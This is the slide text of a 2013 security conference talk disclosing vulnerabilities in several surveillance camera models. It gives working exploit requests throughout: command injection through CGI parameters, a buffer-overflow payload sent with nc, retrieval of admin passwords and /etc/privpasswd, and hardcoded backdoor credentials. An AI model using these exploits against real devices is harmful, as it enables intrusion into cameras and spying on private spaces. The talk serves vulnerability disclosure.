Exploiting Surveillance Cameras Like a Hollywood Hacker Craig - PowerPoint PPT Presentation

Exploiting Surveillance Cameras Like a Hollywood Hacker Craig Heffner, Tactical Network Solutions Friday, July 12, 2013

Introduction ✤ Embedded vulnerability analyst for Tactical Network Solutions ✤ Embedded Device Exploitation course instructor ✤ I do wireless stuff from time to time too Friday, July 12, 2013

Objectives ✤ Analyze surveillance camera security ✤ Drop some 0-days ✤ Demo a true Hollywood-style hack Friday, July 12, 2013

D-Link DCS-7410 Friday, July 12, 2013

Lighttpd Access Rules Friday, July 12, 2013

What Isn’t in the Access Rules? Friday, July 12, 2013

rtpd.cgi Friday, July 12, 2013

eval($QUERY_STRING) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? action=stop ✤ Friday, July 12, 2013

Friday, July 12, 2013

The Exploit (No, Seriously...) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? reboot Friday, July 12, 2013

Grabing Admin Creds ✤ /cgi-bin/rtpd.cgi? echo&AdminPasswd_ss|tdb&get&HTTPAccount ✤ Friday, July 12, 2013

pwned. Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Shodan Dork Friday, July 12, 2013

CVE-2013-1599 ✤ Disclosed by Core Security after talk submission Friday, July 12, 2013

WVC80N Friday, July 12, 2013

/img/snapshot.cgi Friday, July 12, 2013

/adm/ez.cgi Friday, July 12, 2013

strcpy(dest, QUERY_STRING) Friday, July 12, 2013

Friday, July 12, 2013

/img/snapshot.cgi?A*152 Friday, July 12, 2013

Where to Return? Friday, July 12, 2013

Return to sub_9B88 ✤ PAYLOAD=$(perl -e 'print "A"x148; print " \x88\x9B "') ✤ echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n" | nc 192.168.1.100 80 Friday, July 12, 2013

When Base64 Isn’t Base64 Friday, July 12, 2013

BEST. USER GUIDE. EVER. Friday, July 12, 2013

Decoded Config Friday, July 12, 2013

pwned. Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Shodan Dorks Friday, July 12, 2013

Cisco PVC-2300 Friday, July 12, 2013

.htpasswd Protection Friday, July 12, 2013

/usr/local/www/oamp Friday, July 12, 2013

cgi_get_value(var_18, “action”) Friday, July 12, 2013

Valid Actions ✤ downloadConfigurationFile ✤ uploadConfigurationFile ✤ updateFirmware ✤ loadFirmware ✤ ... Friday, July 12, 2013

getenv(“SESSIONID”) Friday, July 12, 2013

strcasecmp(“login”, action) Friday, July 12, 2013

cgi_get_value(var_10, “user”) Friday, July 12, 2013

cgi_get_value(var_10, “password”) Friday, July 12, 2013

PRO_GetStr(“OAMP”, “l1_usr”, ...) Friday, July 12, 2013

PRO_GetStr(“OAMP”, “l1_pwd”, ...) Friday, July 12, 2013

strcmp(user, l1_usr) Friday, July 12, 2013

strcmp(password, l1_pwd) Friday, July 12, 2013

Where are l1_usr and l1_pwd? Friday, July 12, 2013

Friday, July 12, 2013

Getting a Session ID ✤ $ wget http://192.168.1.101/oamp/System.xml? action=login&user=L1_admin&password=L1_51 ✤ Friday, July 12, 2013

downloadConfigurationFile ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=downloadConfigurationFile Friday, July 12, 2013

When Base64 Isn’t Base64 Friday, July 12, 2013

Non-Standard Key String Friday, July 12, 2013

Decoded Config Friday, July 12, 2013

pwned. Friday, July 12, 2013

action=loadFirmware Friday, July 12, 2013

Friday, July 12, 2013

pwned x2 ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=loadFirmware&url=https://127.0.0.1:65534/ ;reboot; Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Shodan Dork Friday, July 12, 2013

IQInvision IQ832N Friday, July 12, 2013

Default Unauth Video Feed Friday, July 12, 2013

Admin Area Password Protected Friday, July 12, 2013

oidtable.cgi Friday, July 12, 2013

strstr(QUERY_STRING, “grep=”) Friday, July 12, 2013

if(strlen(grep) < 32) Friday, July 12, 2013

sprintf(“grep -i ‘%s’...”) Friday, July 12, 2013

popen(“grep -i ‘%s’...”) Friday, July 12, 2013

Friday, July 12, 2013

Command Injection ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/tmp/a;ps;' ✤ grep -i ‘’ /tmp/a;ps;’’ /tmp/oidtable.html Friday, July 12, 2013

Retrieving Arbitrary Files ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/etc/privpasswd;' ✤ grep -i ‘’ /etc/privpasswd;’’ /tmp/oidtable.html Friday, July 12, 2013

Encrypted Admin Password Friday, July 12, 2013

Decrypted Admin Password Friday, July 12, 2013

pwned. Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Shodan Dork ✤ jht Friday, July 12, 2013

3SVision N5071 Friday, July 12, 2013

Restricted Firmware Download Friday, July 12, 2013

Friday, July 12, 2013

Use the Source, Luke Friday, July 12, 2013

Literacy FTW Friday, July 12, 2013

/home/3s/bin Friday, July 12, 2013

pwdgrp_get_userinfo Friday, July 12, 2013

Friday, July 12, 2013

Hardest. Exploit. Ever. Friday, July 12, 2013

pwned. Friday, July 12, 2013

pwned. Friday, July 12, 2013

pwned. Friday, July 12, 2013

do_records Friday, July 12, 2013

records.cgi?action=remove Friday, July 12, 2013

strstr(cgi_parameters, “&filename”) Friday, July 12, 2013

system(“rm /mnt/sd/media/%s”) Friday, July 12, 2013

pwned x2 ✤ $ wget \ --user=3sadmin --password=27988303 \ 'http://192.168.1.101/records.cgi?\ action=remove&storage=sd&filename= `reboot` ' Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Also Affected Friday, July 12, 2013

Shodan Dorks Friday, July 12, 2013